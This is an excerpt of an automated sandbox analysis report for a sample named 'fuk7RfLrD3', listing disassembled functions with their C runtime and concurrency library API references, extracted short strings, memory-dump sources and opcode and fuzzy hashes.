Instruction Fuzzy Hash: 6F115B772000814FDE048A3EC4B85F7A39FEBD73A072C63BBD0428BF44D926E8459500

Function 00670042 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 53dc8981a2fb0b6832a1cf7b497b4d2f8c789ebc6abbd52aea41beb40ac72a14
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 4F113C72340100EFEB54DE65DC91FA673EAEB89370B298169E908CB356D676EC42C760

Function 006F905B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1382263686.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 006F8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f8000_fuk7RfLrD3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 2b82228e4ca70248a06c35a436c1929398ae6df367c363634128cf996af1194a
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 18118E72340104AFDB54DF55DC81FB673EAEB88360B298069EE08CB316DA76EC02C760

Function 006A07EF Relevance: .0, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0b3940eec2b2cd11d836b6e6cdb7d98a3528c1136410bfb24a116e7c525e7d2
Instruction ID: c8d1aa46edc805bf169acdaa49aa3dec71931752101ae8f0c60bae18f47f6dc6
Opcode Fuzzy Hash: b0b3940eec2b2cd11d836b6e6cdb7d98a3528c1136410bfb24a116e7c525e7d2
Instruction Fuzzy Hash: A9E0B635000648AFDF11BF94DD09F993B6AEF42B52F044428F9159B236DB3ADE42CE98

Function 0069F042 Relevance: 21.3, APIs: 14, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0069F0B2
_free.LIBCMT ref: 0069F0C8
_free.LIBCMT ref: 0069F0D9
_free.LIBCMT ref: 0069F0EA
_free.LIBCMT ref: 0069F101

Part of subcall function 006A707B: _free.LIBCMT ref: 006A70E6

_free.LIBCMT ref: 0069F2F5
_free.LIBCMT ref: 0069F308
_free.LIBCMT ref: 0069F316
_free.LIBCMT ref: 0069F321
_free.LIBCMT ref: 0069F363
_free.LIBCMT ref: 0069F36B
_free.LIBCMT ref: 0069F373
_free.LIBCMT ref: 0069F37B
_free.LIBCMT ref: 0069F389

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction ID: 26badf1bdbcbc3fc2344dc48c50afdda79b94f12315ce46a5d86e66c67652df6
Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction Fuzzy Hash: 8EB17DB1900205ABDB11EFA8C882BEEBBFAFF09300F15406DF456E7752DA7599418B64

Function 006AAF88 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006AAFC1
___free_lconv_mon.LIBCMT ref: 006AAFCC

Part of subcall function 006AA31B: _free.LIBCMT ref: 006AA338
Part of subcall function 006AA31B: _free.LIBCMT ref: 006AA34A
Part of subcall function 006AA31B: _free.LIBCMT ref: 006AA35C
Part of subcall function 006AA31B: _free.LIBCMT ref: 006AA36E
Part of subcall function 006AA31B: _free.LIBCMT ref: 006AA380
Part of subcall function 006AA31B: _free.LIBCMT ref: 006AA392
Part of subcall function 006AA31B: _free.LIBCMT ref: 006AA3A4
Part of subcall function 006AA31B: _free.LIBCMT ref: 006AA3B6
Part of subcall function 006AA31B: _free.LIBCMT ref: 006AA3C8
Part of subcall function 006AA31B: _free.LIBCMT ref: 006AA3DA
Part of subcall function 006AA31B: _free.LIBCMT ref: 006AA3EC
Part of subcall function 006AA31B: _free.LIBCMT ref: 006AA3FE
Part of subcall function 006AA31B: _free.LIBCMT ref: 006AA410

_free.LIBCMT ref: 006AAFE3
_free.LIBCMT ref: 006AAFF8
_free.LIBCMT ref: 006AB003
_free.LIBCMT ref: 006AB025
_free.LIBCMT ref: 006AB038
_free.LIBCMT ref: 006AB046
_free.LIBCMT ref: 006AB051
_free.LIBCMT ref: 006AB089
_free.LIBCMT ref: 006AB090
_free.LIBCMT ref: 006AB0AD
_free.LIBCMT ref: 006AB0C5

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: _free$___free_lconv_mon
String ID:
API String ID: 3658870901-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: 6eab94493709c7cd87baa04f5420670464ab6e8137eb12a74a1c40f2676b05d8
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: E3312931600201DFDB61BA79D886B9AB7EAFF02310F14951EF46A9A252DF71AD80CF15

Function 006A2776 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006A278A
_free.LIBCMT ref: 006A2796
_free.LIBCMT ref: 006A27A1
_free.LIBCMT ref: 006A27AC
_free.LIBCMT ref: 006A27B7
_free.LIBCMT ref: 006A27C2
_free.LIBCMT ref: 006A27CD
_free.LIBCMT ref: 006A27D8
_free.LIBCMT ref: 006A27E3
_free.LIBCMT ref: 006A27F1

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: fcef8d2c0c69637f99f2ff915dd029f6de0505070ad1a9c3f2ff4b97a5fb8b72
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 7511897A510158FFCB81FF58C892CD93B66EF06350B5180A9F9094F222DA31DF519F84

Function 0069134F Relevance: 13.6, APIs: 9, Instructions: 136threadCOMMON

Download Yara Rule

APIs

Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 006913C6
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 006913E3
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00691449
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 0069145E
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 00691470
Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 0069149E
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 006914A9
__CxxThrowException@8.LIBVCRUNTIME ref: 006914D5
Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 006914E5

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::details::$Base::ContextInternal$Work$Chore$AssociatedCompletionCreateCurrentException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThreadThrowTransferWait
String ID:
API String ID: 1102740027-0
Opcode ID: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
Instruction ID: d28e4ad8b7be554162941c26a6efacdfc5080218e56fc3d633f88bef179431e7
Opcode Fuzzy Hash: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
Instruction Fuzzy Hash: 1B41AE30A042069BDF54FFA484557FC77AB6F06700F2440ADE8466FB83CB249E05CBAA

Function 0068CDE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

atomic_compare_exchange.LIBCONCRT ref: 0068CE05
atomic_compare_exchange.LIBCONCRT ref: 0068CE29
std::_Cnd_initX.LIBCPMT ref: 0068CE3A
std::_Cnd_initX.LIBCPMT ref: 0068CE48

Part of subcall function 00671AA9: __Mtx_unlock.LIBCPMT ref: 00671AB0

std::_Cnd_initX.LIBCPMT ref: 0068CE58

Part of subcall function 0068CB18: __Cnd_broadcast.LIBCPMT ref: 0068CB1F

Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0068CE66

Strings

d#D, xrefs: 0068CDEB

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
String ID: d#D
API String ID: 4258476935-2139572230
Opcode ID: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
Instruction ID: 08fd6292af2151dac876578fc5ade3560b7454a096984bbc2ad4de22dfa064ba
Opcode Fuzzy Hash: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
Instruction Fuzzy Hash: 0001F771900A05A7DB61F764CC4AB9DB75BAF00720F104219F6055B282DB74EB09CBA9

Function 006A1852 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006A286A: _free.LIBCMT ref: 006A28A1

_free.LIBCMT ref: 006A1B6D
_free.LIBCMT ref: 006A1B86
_free.LIBCMT ref: 006A1BB8
_free.LIBCMT ref: 006A1BC1
_free.LIBCMT ref: 006A1BCD

Strings

C, xrefs: 006A19BA

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: _free
String ID: C
API String ID: 269201875-1037565863
Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction ID: 0bd37ecf854a40e656f84e5ce66b32ab352cc0d99e3ed7f7d760ac444cf369a7
Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction Fuzzy Hash: 2BB14A75A012199FDB24EF18C885BADB3B5FF0A304F1045EAE849AB350E730AE91CF40

Function 006AA83E Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006AA8AD
_free.LIBCMT ref: 006AA8BB
_free.LIBCMT ref: 006AA9E9
_free.LIBCMT ref: 006AA9F4

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction ID: 862e80eb98a6ea186927c75abf6e4628b7f4f9701019757635ad462344ac93b2
Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction Fuzzy Hash: F461B371D04205AFDB60EFA8C842B9ABBF6EF46710F1441AAE945EB341DB309D41CF55

Function 0067207B Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00672086

Part of subcall function 0067D5A6: _strlen.LIBCMT ref: 0067D5BD

_strlen.LIBCMT ref: 006720E9
_strlen.LIBCMT ref: 00672118
_strlen.LIBCMT ref: 0067225C

Strings

4#E, xrefs: 00672096
i, xrefs: 006720F9

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: _strlen$H_prolog3_
String ID: 4#E$i
API String ID: 2786647812-2480119546
Opcode ID: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
Instruction ID: 9795f4d9ddc7128a7fdd631f22813e48ec0b412253496759d8d98c338d8d2518
Opcode Fuzzy Hash: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
Instruction Fuzzy Hash: 5B510031C00385DBE7119BA4ED567EC7B74FF2A306F049228E809A6163EB709B85C76D

Function 006951DD Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 006951F6
Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0069520B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0069521A
__CxxThrowException@8.LIBVCRUNTIME ref: 00695228
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0069529E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 006952DE
__CxxThrowException@8.LIBVCRUNTIME ref: 006952EC

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleProxy::ResetSuspendThread
String ID:
API String ID: 1615543006-0
Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
Instruction ID: c81f2968ccb623c112347ba69cc20d69635f17c7a51f25403643261b8f09a4ce
Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
Instruction Fuzzy Hash: 8431C335A006149FCF06EF68C885AAD77BEFF54310F2045A9EC16A7782DB70EE068794

Function 006AAD13 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006AAA5A: _free.LIBCMT ref: 006AAA83

_free.LIBCMT ref: 006AAD61
_free.LIBCMT ref: 006AAD6C
_free.LIBCMT ref: 006AAD77
_free.LIBCMT ref: 006AADCB
_free.LIBCMT ref: 006AADD6
_free.LIBCMT ref: 006AADE1
_free.LIBCMT ref: 006AADEC

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 27fb311df7f1c9fa3df88c0b52b70f99ba897440e15da80b4f494570fa1b981e
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: 79115E72640705EAD5A0B7B0CD4BFCB7BDEAF02700F40481EB79A6A152DB24AE04CE59

Function 00405E36 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00405E42

Part of subcall function 00405651: __getptd_noexit.LIBCMT ref: 00405654
Part of subcall function 00405651: __amsg_exit.LIBCMT ref: 00405661

__amsg_exit.LIBCMT ref: 00405E62
__lock.LIBCMT ref: 00405E72
InterlockedDecrement.KERNEL32(?), ref: 00405E8F
InterlockedIncrement.KERNEL32(02351690), ref: 00405EBA

Strings

@vE, xrefs: 00405E99

Memory Dump Source

Source File: 00000000.00000002.1380674376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1380650871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380674376.0000000000411000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380736482.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380863350.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1381027423.00000000004C6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID: @vE
API String ID: 4271482742-4027072445
Opcode ID: 89fabfd9aa65077119dc3f36951229830d10a0be4fbbb6f75dea3161cc9328b6
Instruction ID: ea48e15fab0e67cf00ff7678e285a8ce900b28dfca8ec844c51002645abfb749
Opcode Fuzzy Hash: 89fabfd9aa65077119dc3f36951229830d10a0be4fbbb6f75dea3161cc9328b6
Instruction Fuzzy Hash: D0013932945B21ABCB21AB65D84975F7664AB00B26F14003AE844B73D2C73CAB81CFDD

Function 0069EB42 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0069EB6E
__cftoe.LIBCMT ref: 0069EBA0

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction ID: df2e8f540c643ff63998791114a745fa5e02907c07ad873e3dc54e373b6cd81d
Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction Fuzzy Hash: 02510A72900205EBDF64EB5C8D45EEE77AFEF49320F24421EF415D6682EB32DD409A68

Function 00693754 Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 0069377A
SafeSQueue.LIBCONCRT ref: 00693793
Concurrency::location::_Assign.LIBCMT ref: 00693853
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00693874
__CxxThrowException@8.LIBVCRUNTIME ref: 00693882

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_Exception@8QueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 1854678904-0
Opcode ID: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
Instruction ID: 9301fbd0d8afc4c2e11fb450284dd90b60c1fd5a272d80b15397215847439a76
Opcode Fuzzy Hash: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
Instruction Fuzzy Hash: DB3115716006219FCF65EF68C485AAAB7FAFF04710F14865DE8069B742DB30EE05CB94

Function 0069964D Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 006996A0
FindMITargetTypeInstance.LIBVCRUNTIME ref: 006996B9
FindVITargetTypeInstance.LIBVCRUNTIME ref: 006996C0
PMDtoOffset.LIBCMT ref: 006996DF

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: FindInstanceTargetType$Offset
String ID:
API String ID: 1467055271-0
Opcode ID: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
Instruction ID: 67795bd31cfd0dbc9eba25c22b5309b1b21279f2a1cea59a3d46d40c81ae25ce
Opcode Fuzzy Hash: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
Instruction Fuzzy Hash: 9E2107726042059FEF14DFACDC46AA977AEEB45710B20421EF915D7A80EB31E90186B9

Function 00675B66 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

__Cnd_init.LIBCPMT ref: 00675B7A
__Mtx_init.LIBCPMT ref: 00675BA0
std::_Cnd_initX.LIBCPMT ref: 00675BC3
__Thrd_start.LIBCPMT ref: 00675BE8
std::_Cnd_waitX.LIBCPMT ref: 00675C08
std::_Cnd_initX.LIBCPMT ref: 00675C35

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
Instruction ID: 684668ade792272facd5483091b8b25a0e142431e24e11b96a188d4ff51693ae
Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
Instruction Fuzzy Hash: B221A671C052089EEF45EBF8D841BDDB7FDAF09320F14845EE009B7241DBB599448B69

Function 006756E8 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006756F9
int.LIBCPMT ref: 00675710

Part of subcall function 0067C6F2: std::_Lockit::_Lockit.LIBCPMT ref: 0067C703
Part of subcall function 0067C6F2: std::_Lockit::~_Lockit.LIBCPMT ref: 0067C71D

std::locale::_Getfacet.LIBCPMT ref: 00675719
std::_Facet_Register.LIBCPMT ref: 0067574A
std::_Lockit::~_Lockit.LIBCPMT ref: 00675760
__CxxThrowException@8.LIBVCRUNTIME ref: 0067577E

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
Instruction ID: 4ccf19b19dde6d4f70c732eaeed6991dbbfb7278f5e08896af7f806aab3fad1a
Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
Instruction Fuzzy Hash: 7D112531900618DFCB98EBA4C841AED73B6BF44310F10849CF41AB72D2EF749A098B99

Function 006755AA Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006755BB
int.LIBCPMT ref: 006755D2

Part of subcall function 0067C6F2: std::_Lockit::_Lockit.LIBCPMT ref: 0067C703
Part of subcall function 0067C6F2: std::_Lockit::~_Lockit.LIBCPMT ref: 0067C71D

std::locale::_Getfacet.LIBCPMT ref: 006755DB
std::_Facet_Register.LIBCPMT ref: 0067560C
std::_Lockit::~_Lockit.LIBCPMT ref: 00675622
__CxxThrowException@8.LIBVCRUNTIME ref: 00675640

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
Instruction ID: 7520655e8c05ae3133be4e4854e756bb3b44cc7ccdaa8379bc237ac509b0750c
Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
Instruction Fuzzy Hash: EB112531C006189BCF94EF60C8459ED77B2BF44310F10804CF51AA72A2DB749905CB98

Function 0067CB1F Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0067CB30
int.LIBCPMT ref: 0067CB47

Part of subcall function 0067C6F2: std::_Lockit::_Lockit.LIBCPMT ref: 0067C703
Part of subcall function 0067C6F2: std::_Lockit::~_Lockit.LIBCPMT ref: 0067C71D

std::locale::_Getfacet.LIBCPMT ref: 0067CB50
std::_Facet_Register.LIBCPMT ref: 0067CB81
std::_Lockit::~_Lockit.LIBCPMT ref: 0067CB97
__CxxThrowException@8.LIBVCRUNTIME ref: 0067CBB5

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
Instruction ID: c441c5f42b5b859ac3a4e570bde5f81454ef135bc92a8e99a6fb809e3cfbcaa6
Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
Instruction Fuzzy Hash: EC11C231800228ABCF54FB64C846AED77B6AF44721F10851DF41967292DF349A04CB99

Function 00404597 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 004045B9
__calloc_crt.LIBCMT ref: 004045D2

Strings

xsE, xrefs: 0040460B
uE, xrefs: 004045FE
hsE, xrefs: 004045E9

Memory Dump Source

Source File: 00000000.00000002.1380674376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1380650871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380674376.0000000000411000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380736482.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1380863350.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1381027423.00000000004C6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fuk7RfLrD3.jbxd

Similarity

API ID: __calloc_crt
String ID: hsE$xsE$uE
API String ID: 3494438863-2092874719
Opcode ID: ca9205585c9a7f3d79cb6157a903b73c6ca4fd1aa080325f5c9925276b4f3989
Instruction ID: 8a0283b7aa45433efd6af21b51ef88dcfccbcc6902249dea21655c5258545c94
Opcode Fuzzy Hash: ca9205585c9a7f3d79cb6157a903b73c6ca4fd1aa080325f5c9925276b4f3989
Instruction Fuzzy Hash: E311ABB160461167E7148E1E7C806B62391A7C9728714477BFB02D73D4F73CD842854D

Function 006B101A Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 006B1021
make_shared.LIBCPMT ref: 006B106C

Strings

f)D, xrefs: 006B101C
RCC, xrefs: 006B1053
MOC, xrefs: 006B1044

Memory Dump Source

Source File: 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_670000_fuk7RfLrD3.jbxd

Similarity

API ID: H_prolog3_catchmake_shared
